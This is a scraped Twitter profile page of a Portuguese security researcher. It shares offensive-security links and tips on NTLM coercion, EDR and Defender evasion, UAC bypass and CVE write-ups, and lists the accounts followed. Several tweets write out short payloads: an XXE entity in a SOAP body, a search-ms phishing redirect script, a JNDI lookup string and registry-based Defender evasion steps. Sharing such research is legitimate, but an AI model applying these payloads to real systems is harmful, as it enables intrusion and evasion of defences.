Tiago Sintra @henshinpt
Code breaker Portugal Joined March 2014-
Tweets255
-
Followers386
-
Following133
-
Likes772
Ever wanted to trigger a #NTLM authentication to a machine using every possible RPC call ? You can do this using #Coercer 🥳🎉 This tool automatically detects available pipes and protocols and call every possible functions to trigger an #authentication. github.com/p0dalirius/Coe…
Spooler service disabled, RPC filters installed to prevent PetitPotam and File Server VSS Agent Service not installed but you still want to relay DC authentication to ADCS? Don't worry MS-DFSNM have your back ;) github.com/Wh04m1001/DFSC…
Insecure Features in PDFs. We analyzed legitimate PDF features leading to 1. Denial of Service 2. Information Disclosure 3. Data Manipulation 4. and Code Execution (NDSS'21 Paper). web-in-security.blogspot.com/2021/01/insecu… /cc @jensvoid Dominik Noss, @v_mladenov, @JoergSchwenk
New Year's special - learn how to take full control of your neighbor's router with @pedrib1337 and @RabbitPro! youtube.com/watch?v=zjafMP…
Want to get more credits for SecurityTrails API™? Just retweet this tweet and you will get 100 RECURRING API CREDITS 🎉 Ends 28 Nov 2020, 3pm EST. Make sure we can PM you to ask for the email address you signed up with.
Checkout my new writeup on how could a website steal all your Firefox cookies remotely 📱🐛. CVE-2020-15647: Arbitrary local file access in Firefox for Android #MobileSecurity #AndroidSecurity #Android #BugBounty medium.com/@kanytu/firefo…
How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM (slides inside) blog.orange.tw/2020/09/how-i-… #HITCON
Introducing FireWalker: A New Approach to Generically Bypass User-Space EDR Hooking mdsec.co.uk/2020/08/firewa… by @peterwintrsmith #redteam #firewalker #MDSec
We have an announcement about our Cracking the Perimeter course. CTP will be retired this year, with the last date for purchase being October 15, 2020. Please read our update for info about what's happening and why: offs.ec/2FmmD01
I'm just gonna leave this here... some EPIC work from @peterwintrsmith with some kind CS support from @buffaloverflow... in process CLR for @armitagehacker's Cobalt Strike
My F5 BIG-IP Unauth Remote Command Execution (CVE-2020-5902). Please update your software. ptsecurity.com/ww-en/about/ne…
Here is a CNA script for abusing the print spooler named pipe impersonation trick by @itm4n Useful to get SYSTEM with only SeImpersonatePrivilege and can be used as an alternative to getsystem. Came in handy recently and wanted to share the ❤️ github.com/rxwx/spoolsyst…
My blogpost on CVE-2020-1317 I was holding this for a while. cyberark.com/resources/thre…
I've managed to forget about how crazy the world is right now and focus purely on source code review, hunting and exploiting bugs for 48 hours and got myself #OSWE certified! Another fine course from @offsectraining! 🥳
TamperETW, x64 PoC to demonstrate how CLR ETW events can be tampered or filtered before being submitted. Based on great research by @MDSecLabs / @_xpn_ on hiding .NET assemblies from ETW. github.com/outflanknl/Tam…
This is the most comprehensive analysis I've seen so far about Covid-19 and how different countries are handling it. Governments need to start taking serious measures to contain this now medium.com/@tomaspueyo/co…
ICYMI - @0xthirteen released MoveKit and StayKit, a collection of aggressor scripts, .NET projects, and templates to enhance lateral movement and persistence on your engagements. Link: posts.specterops.io/move-faster-st… MoveKit: github.com/0xthirteen/Mov… StayKit: github.com/0xthirteen/Sta…
Added another round of seats for #RedTeamOps !! These are the last ones I'll be able to add for a while, so if you're planning on taking the course, grab it fast! zeropointsecurity.co.uk/courses/red-te…
André @0xacb
14K Followers 704 Following Hacker grinding for L1gh7 and Fr33dφm, straight outta the cosmic realm. Co-founder @ethiack
morisson @morisson
1K Followers 598 Following Breaker of bits. @BSidesLisbon founder and organiser. Mastodon: @[email protected] DISCLAIMER: Tweets are no one’s opinion, probably not even mine.
HackerOne @Hacker0x01
289K Followers 3K Following The only official HackerOne Twitter account. Peace of mind from security's greatest minds. #HackForGood #togetherwehitharder
Nicolas Grégoire @Agarri_FR
26K Followers 608 Following Web hacker and Burp Suite Pro trainer Refer to https://t.co/D5tRH7U2hg for trainings Follow @MasteringBurp for free tips and tricks
Micheal Koch @MichealKoc99058
141 Followers 3K Following
Sharpe @Sharpe_1984
0 Followers 50 Following
Franky Goes To Hollyw.. @FatBadger699
44 Followers 411 Following
MgC @FoxyVoske
79 Followers 2K Following
b0ker @b0ker1
0 Followers 6 Following
@2600pt @2600pt
35 Followers 131 Following Twitter site for the Portugal @2600meetings. Join us at the Amoreiras Shopping in Lisbon, food court next to Portugalia. Every first Friday at 19h00.
Jack Torrance @H3r3s_J0hnny
34 Followers 433 Following
MichMich @MichMic24390592
0 Followers 18 Following
test @firebasky
461 Followers 270 Following
José Moreira @cusspvz
231 Followers 1K Following Software Architecture, Security and Infrastructure | Open-Source @mosanotech | my tweets express my personal opinion.
li @Hsmoy2022
0 Followers 87 Following
John @John87367619
10 Followers 112 Following
Reasonable_In🖊 @ResonableI
306 Followers 5K Following Billionaire bros, Anti - { Liberal, Feminist, Colonist, Communist, Sugardaddy, Protagonist, Capitalist, Socialist} Group of 34 guys using same acc😂bonito sor
Nick Popovich @pipefish_
2K Followers 1K Following Amateur Crastinator trying to go pro. Soli Deo gloria
刘洪泉 @p3UWWrivBRWhrbO
0 Followers 8 Following
CPLASF @cplasf6700
2 Followers 169 Following
叶飞 @cocoyefei
11 Followers 608 Following
Hisxo @adrien_jeanneau
9K Followers 1K Following 📍 @yeswehack (aka Hisxo) - I love to break things (and I'm paid for that) - Bug Hunter 🔗 Check my Github repository https://t.co/Sj3prhiZyu #BugBounty
João Biscaia Fraga @neat_terrain
124 Followers 1K Following Lover of God and life || Ethical hacker wannabe || Computer Science student || Martial Arts || Violinist
0x_Mac @TheCyptoOracle
172 Followers 564 Following AI Sentient- 0xIdentities - Trust - Guidance - The Founding Council has been established.
uhhh @uhhx19
97 Followers 1K Following
Youssef Hach @Y0ceef
5 Followers 142 Following
Sickrov @sickrov
169 Followers 1K Following He loves Sushi, Pizza, Pastrami, Brisket, Monster and CTF's🏴☠️
Francisco Farinha @frarinha
252 Followers 726 Following
Precious Waseni @PreciousWaseni
21 Followers 250 Following Bug Hunter | Cyber Security | Digital Forensics | CTF player | Ethical Hacker | Vulnerable Mashines
THOTH @THOTH_vv
249 Followers 781 Following
Ehetsham Ul Haq @EhetshamUl
4 Followers 566 Following
T-bag @its_Kangara
328 Followers 3K Following Tweets about Cloud & Application Security, Bug hunting and Smart contracts audit. #FB
Promac_ng @PromacN
5 Followers 103 Following
Ricardo Pinto @rjlpinto
155 Followers 691 Following Cybersecurity and InfoSec with Data Protection as pillars for the 2020 gen. CISM, ISO27001 LI, CISPP training, IT/OT, CIPP/E, CIPM.
sn1p@s @snipasRR
42 Followers 439 Following
Peruvilnmarketer @Hakerallison071
17 Followers 186 Following I got some recommendations for you on how you can earn massively through trading on short terms
saad yehia @saadyehia74
7 Followers 649 Following
PedroV @pjvenda@infos.. @pjvenda
250 Followers 356 Following I rant about my love for information security, Linux, engineering, science and cars & driving. Also PTP techie for many years. @[email protected]
Andres Barrera @MrTechi_
151 Followers 365 Following Python Engineer Developer, InfoSec graduate (RHUL) Learning Big Data, DevSecOps/Application Security enthusiastic :D
DegenSnap @indigokiddd
77 Followers 787 Following
paullmq @paullmq8
11 Followers 567 Following
Tomás Lima @_tomaslima
62 Followers 352 Following
Cataa @Cataa75621533
1 Followers 119 Following
André @0xacb
14K Followers 704 Following Hacker grinding for L1gh7 and Fr33dφm, straight outta the cosmic realm. Co-founder @ethiack
vx-underground @vxunderground
293K Followers 211 Following The largest collection of malware source code, samples, and papers on the internet. Password: infected
morisson @morisson
1K Followers 598 Following Breaker of bits. @BSidesLisbon founder and organiser. Mastodon: @[email protected] DISCLAIMER: Tweets are no one’s opinion, probably not even mine.
shubs @infosec_au
50K Followers 2K Following Co-founder, security researcher. Building an attack surface management platform, @assetnote
BSidesLisbon @Bsideslisbon
2K Followers 117 Following Portugal’s premier technical information security conference - 14-15 November 2024, Auditorio FMD-UL, Lisbon, Portugal @[email protected]
HackerOne @Hacker0x01
289K Followers 3K Following The only official HackerOne Twitter account. Peace of mind from security's greatest minds. #HackForGood #togetherwehitharder
Nicolas Grégoire @Agarri_FR
26K Followers 608 Following Web hacker and Burp Suite Pro trainer Refer to https://t.co/D5tRH7U2hg for trainings Follow @MasteringBurp for free tips and tricks
Swissky @pentest_swissky
17K Followers 2K Following RedTeam | Pentest Author of PayloadsAllTheThings & SSRFmap https://t.co/w1ZLRqoafG
PentesterLab @PentesterLab
154K Followers 0 Following We make learning web hacking and security easier. Online systems, code review, videos & courses that can be used to understand, test and exploit bugs!
SecurityTrails, A Rec.. @securitytrails
13K Followers 2K Following Security Trails was acquired by Recorded Future. To see what's new, visit @RecordedFuture.
James Kettle @albinowax
70K Followers 83 Following Director of Research at PortSwigger Burp Suite Check out my website for published research, other social platforms & contact details
Fisher @Regala_
10K Followers 470 Following Half hacker, half daydreamer. Mercenary for hire. Casabranca. Snarky tweets only. Opinions my own
X-C3LL @TheXC3LL
5K Followers 622 Following Just a biologist that loves to break cyber-stuff. Ka0labs / @AdeptsOf0xcc / ID-10-Ts member. 🦉
Hugow @hugow_vincent
471 Followers 854 Following Security researcher && cat memes. Climb/fly sometimes 🪂
ProjectDiscovery.io @pdiscoveryio
30K Followers 121 Following Making cybersecurity accessible to everyone. Join us for the security conference for all things open source: Hardly Strictly Security: https://t.co/R7NlVw3cBJ
How Things Are Manufa.. @fastworkers6
877K Followers 10K Following This is official Twitter account for How Things Are Manufactured. Stay with us
Joe Grand @joegrand
25K Followers 609 Following Hardware hacker, computer engineer, former L0pht member and juvenile delinquent, sometimes known as Kingpin.
Trickest @trick3st
9K Followers 140 Following Enabling bug bounty hunters, penetration testers, and SecOps teams to build and automate workflows from start to finish.
Arno0x0x @Arno0x0x
2K Followers 121 Following The difference between stupidity and genius is that genius has its limits.
Nick Popovich @pipefish_
2K Followers 1K Following Amateur Crastinator trying to go pro. Soli Deo gloria
Chetan Nayak (Brute R.. @NinjaParanoid
27K Followers 0 Following DarkVortex Founder | https://t.co/x8K5gzt2RG | Former RedTeam @CrowdStrike/@Mandiant/@niiconsulting
The Hacker's Choice (.. @hackerschoice
20K Followers 51 Following Not much activity here anymore, follow us at https://t.co/ZFXJjJAKvM security research group: The Hacker's Choice (1995). group account.
Bad Sector Labs @badsectorlabs
6K Followers 440 Following Cybersecurity news, techniques, exploits, and tools every week at https://t.co/UgKmeEEjIV 🐘 @[email protected]
尺Ξn4tø 尺ødɿig.. @simps0n
3K Followers 235 Following ╪ͥ͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋͋ ◯ ⃝ ⃝ ⃝ ⌨ ⁰☠ ☂ ☺ ♬
[email protected].. @honoki
7K Followers 2K Following cyber entomologist 🐛 hack for fun and profit 💰 amateur musician 🎹 occasional blogger @[email protected]
Flashback Team @FlashbackPwn
4K Followers 3 Following Hacking team (@pedrib1337 + @RabbitPro), winners of Pwn2Own Tokyo 2020. We hack stuff and make videos: https://t.co/lqSIfETowB
Nicky Bloor @nickstadb
2K Followers 715 Following Coder, hacker, infosec researcher, adrenaline junkie. Once hiked Ben Nevis, Scafell Pike, and Snowdon in 22h 48m. Not a snake oil peddler.
Jas502n @jas502n
9K Followers 1K Following ${jndi:dns://${hostName}.github.com/jas502n} Become Who You Are
cpl @cpl3h
1K Followers 146 Following Intelligence - 1 Wisdom - 1 Charisma - 1 Persistence - 10 Luck - 10
spotheplanet @spotheplanet
11K Followers 138 Following Hacking the planet at https://t.co/ifUgKQtEYV. Buy me a vinyl at https://t.co/SO41y55HJL
XSS Payloads @XssPayloads
43K Followers 0 Following
Joseph Cox @josephfcox
88K Followers 3K Following Hacking/crime/privacy journalist. Author of forthcoming DARK WIRE. Co-founder of @404mediaco. Signal: +44 20 8133 5190. Email: [email protected]
Matt Hand @matterpreter
9K Followers 290 Following Director, Security Research @preludeorg 💜 | Author of Evading EDR https://t.co/E5fs0sSTOv 📖 | Adversary tradecraft & windows internals 🦠
Cn33liz @Cneelis
13K Followers 597 Following Red teamer @ Outflank. Passionate about networking and cybersecurity | father of two superheroes.
b4rtik @b4rtik
2K Followers 237 Following Sometimes pentester, sometimes sysadmin. OST Developer at @OutflankNL . eCPPT eCPTX eWPT
Travis Biehn @tbiehn
138 Followers 0 Following Travis Biehn is lost in a single pane of glass fun-house.
ippsec @ippsec
111K Followers 352 Following
Pedro Ribeiro @pedrib1337
8K Followers 309 Following Reverse Engineer | Director @ https://t.co/KuU3tiG1Om | Exploit Chef @FlashbackPwn
44CON @44CON
11K Followers 82 Following UK's best combined Information Security Conference and training event. Newsletter https://t.co/2P1WTeSK4E run by @alien8 https://t.co/lXrBRhPg83
Dominic Chell 👻 @domchell
16K Followers 532 Following Just your friendly neighbourhood red teamer @MDSecLabs | Creator of /r/redteamsec | https://t.co/3k3EBAZqGd | https://t.co/KwO2OwDOkl
RedDrip Team @RedDrip7
15K Followers 29 Following Technical Twitter of QiAnXin Technology, leading Chinese security vendor. It is operated by RedDrip Team which focuses on malware, APT and threat intelligence.
PwnFunction @PwnFunction
38K Followers 981 Following I make animated computer science videos • product & ai @pdiscoveryio • blog at https://t.co/RLiSNOVQ0W
Psych0tr1a @Psych0tr1a
2K Followers 199 Following Bughunter, web-application security researcher, penetration tester from https://t.co/6wN1ZxJei8
samy kamkar @samykamkar
63K Followers 4K Following think bad, do good. | https://t.co/1k7O9o2Gos | cofounder @openpathsec
We’re giving you TWO ways to WIN a one-of-a-kind GeForce RTX 4080 SUPER signed by NVIDIA CEO, and founder, Jensen Huang 👀 If you’re at CES head to our partner booths to enter 👉 nvidia.com/en-us/geforce/… Want to WIN here on social? ⚫Comment #RTXSUPER ⚫Like this post
I updated the EDR telemetry project with corrected telemetry and new additions! See below the changes and upcoming EDRs: ✅ Corrected Trend Micro Telemetry ✅ Corrected ESET Telemetry 🌟 Added Qualys EDR 🎯New Additions Coming Up: 🔜 Sophos EDR 🔜 Cortex EDR Vendors are…
Citrixbleed: On Oct 10th, Citrix announced a security advisory for CVE-2023-4966, a sensitive information disclosure bug marked as CVSS 9.4 affecting Netscaler Gateway. The security research team at @assetnote was able to reproduce the vulnerability. Blog post here:…
Do you want to start the RemoteRegistry service without Admin privileges? Just write into the "winreg" named pipe 👇
Automatically extract URL and IP endpoints from Android app to a txt file using apk2url Fast and useful tool for pentesters, bug bounty hunters, or malware analyst github.com/n0mi1k/apk2url
🚨🚨🚨 Whatever you were thinking about CVE-2023-20198 (#Cisco IOS EX) it's 100x worst. We used @TalosSecurity IOC check and found ~30k implants. That's 30k devices infected (routers, switches, VPNs), under the control of threat actors. That's excluding rebooted devices.
ChatGPT can now see, hear, and speak. Rolling out over next two weeks, Plus users will be able to have voice conversations with ChatGPT (iOS & Android) and to include images in conversations (all platforms). openai.com/blog/chatgpt-c…
🍃 Are you stuck on authorization bypass in a Spring app? This tip can be helpful to you!
How can we run arbitrary code without allocating/overwriting executable memory? We "borrow" (abuse) instructions from ntdll.dll! x86matthew.com/view_post?id=w…
💎🔨 Exploiting Hardened .NET Deserialization: New Exploitation Ideas and Abuse of Insecure Serialization, by Piotr Bazydło (@chudyPB)
Persistence Techniques That Persist cyberark.com/resources/thre…
Fancy Defender evasion? Yet another method, nearly bare hands: 1. Export CurrentControlSet to a file 2. Edit path in a file 3. Import a file as new ControlSet 4. Change "Select" values to new one 5. Reboot 6. Enjoy 😎 A side effect of my "Registry internals" session yesterday 😅
Phishing emails making use of the "search-ms" URI protocol handler to download malicious payload. trellix.com/en-us/about/ne… ClickOnce APT Group also use these technology. <script> window.location.href = 'search-ms:query=Review&crumb=location: \\\\domain@SSL\…
XXE inside a SOAP node: <soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://0x0:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
KRBUACBypass By adding a KERB-AD-RESTRICTION-ENTRY to the service ticket, but filling in a fake MachineID, we can easily bypass UAC and gain SYSTEM privileges. github.com/wh0amitz/KRBUA… Details: tiraniddo.dev/2022/03/bypass… #infosec #pentesting #redteam
"A-Red-Teamer-diaries: RedTeam/Pentest notes and experiments tested on several infrastructures related to professional engagements." #infosec #pentest #redteam github.com/ihebski/A-Red-…
Hunting for Nginx Alias Traversals in the wild labs.hakaioffsec.com/nginx-alias-tr…
Powerful The true dangers of sharing content online. The people that figures out how to combat this will become billionaires.
Pulling SYSTEM out of Windows GINA 🪟: a 0day vuln giving pre-auth SYSTEM shell on domain computers managed by @manageengine ADSelfService Plus
Good article. This is a large issue that I often catch in penetration tests. It’s also a teams default. 👇 Advisory: IDOR in Microsoft Teams Allows for External Tenants to Introduce Malware | JUMPSEC LABS labs.jumpsec.com/advisory-idor-…
Trends for United States
You might like
